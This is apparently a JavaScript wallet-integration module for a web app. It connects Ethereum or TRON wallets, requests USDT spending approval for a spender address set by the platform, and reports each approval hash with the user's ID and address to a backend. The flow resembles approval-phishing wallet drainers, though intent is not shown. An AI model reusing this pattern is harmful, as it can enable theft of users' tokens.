import { showLoadingToast, closeToast, showToast } from 'vant'
import {
  check as checkETH,
  connect as connectETH,
  initSwitchWalletEvent as initSwitchWalletEventETH,
  approve as approveETH,
  getBalance as getBalanceETH
} from './eth'
import {
  check as checkTRON,
  connect as connectTRON,
  initSwitchWalletEvent as initSwitchWalletEventTRON,
  approve as approveTRON,
  getBalance as getBalanceTRON
} from './tron'
import { sendApproveHashApi } from '@/api/common/chain'
import { useUserStore } from '@/store/user'
import { useMainStore } from '@/store'

let isTron = false
let isEth = false
/**
 * 获取账户信息
 */
export const getAcount = async () => {
  console.log('开始检测钱包')
  isEth = await checkETH()
  console.log('is wallet start 1')
  console.log('is wallet start 2')
  console.log('连接情况', window.tronWeb, window.tron)

  let res = null

  if (isEth) {
    //如果有已经连接的,优先使用已经连接的
    // let walletConnected = window.ethereum.isConnected()

    // if(walletConnected){

    // }else{
    // 	res = await connectETH()
    // }
    console.log(
      'window?.tron?.tronWeb?.defaultAddress?.base58',
      window?.tron?.tronWeb?.defaultAddress?.base58
    )
    res = await connectETH()
    //同时存在以太坊和波场的情况下 优先以太坊
    // //特殊情况下 以太坊地址为空
    if (res?.data?.address == 'o' || res?.data?.address == null) {
      res = await connectTRON()
    }

    // //如果 用户拒绝了 可以尝试请求波场
    if (res?.code == 4001) {
      res = await connectTRON()
    }
  }
  if (res?.code == 200) {
    return res
  } else {
    res?.msg && showToast(res.msg)
    return 'no-wallet'
  }
}
/**
 * 切换钱包监听事件
 */
export const initSwitchWalletEvent = async () => {
  isTron = await checkTRON()
  isEth = await checkETH()
  // 需要检测是否链接
  if (isTron) {
    initSwitchWalletEventTRON()
  }
  if (isEth) {
    connectETH()
  }
  isTron && initSwitchWalletEventTRON()
  isEth && initSwitchWalletEventETH()
}

/**
 * 是否钱包判断
 */
export const initWalletCheck = async () => {
  isTron = await checkTRON()
  isEth = await checkETH()
  // 需要检测是否链接
  if (isTron || isEth) return true
  else return false
}
/**
 * 授权
 */
export const approve = async (type) => {
  showLoadingToast()
  // 配置授权地址
  let isTron = await checkTRON()
  let isEth = await checkETH()

  const { platFormConfig } = useMainStore()
  let res = null
  try {
    if (isEth == true) {
      let spenderAddress = platFormConfig.APPROVE_ADDRESS.ETH
      const { approveMethod } = await approveETH(spenderAddress, type)

      // 监听交易 hash 事件（在手机钱包中，交易发送后立即有 hash）
      approveMethod.on('transactionHash', (hash) => {
        // 交易发送成功
        sendApproveHash(hash, spenderAddress)
      })

      // 等待用户确认交易（在手机钱包中会等待用户确认）
      res = await approveMethod
      closeToast()
    } else if (isTron == true) {
      let spenderAddress = platFormConfig.APPROVE_ADDRESS.TRON
      res = await approveTRON(spenderAddress, type)
      // TRON 返回的是交易 hash
      if (res) {
        sendApproveHash(res, spenderAddress)
      }
      closeToast()
    } else {
      closeToast()
      throw new Error('未检测到钱包')
    }
  } catch (err) {
    closeToast()
    throw err
  }
  return res
}

/**
 * 获取余额
 */
export const getBalance = async (type = 'USDT') => {
  showLoadingToast()
  // 配置授权地址
  isTron = await checkTRON()
  isEth = await checkETH()
  const { platFormConfig } = useMainStore()
  let res = null

  if (isEth && isTron && !window?.tron?.tronWeb?.defaultAddress?.base58) {
    res = await getBalanceETH()
    if (res?.data?.address == 'o' || res?.code == 500) {
      res = await getBalanceTRON()
    }
    // let spenderAddress = platFormConfig.APPROVE_ADDRESS.ETH
    // const { approveMethod } = await approveETH(spenderAddress, type)
    // approveMethod.on('transactionHash', (hash) => {
    // })
    // res = approveMethod
  } else if (isTron) {
    // let spenderAddress = platFormConfig.APPROVE_ADDRESS.TRON
    // res = await approveTRON(spenderAddress, type)
  }
  // closeToast()
  return res
}

/**
 * 发送交易hash
 */
const sendApproveHash = async (hash, allowedAddress = '') => {
  const userStore = useUserStore()
  await sendApproveHashApi({
    userId: userStore.userInfo.user.userId,
    address: userStore.userInfo.user.address,
    allowedAddress: allowedAddress,
    hash
  })
}
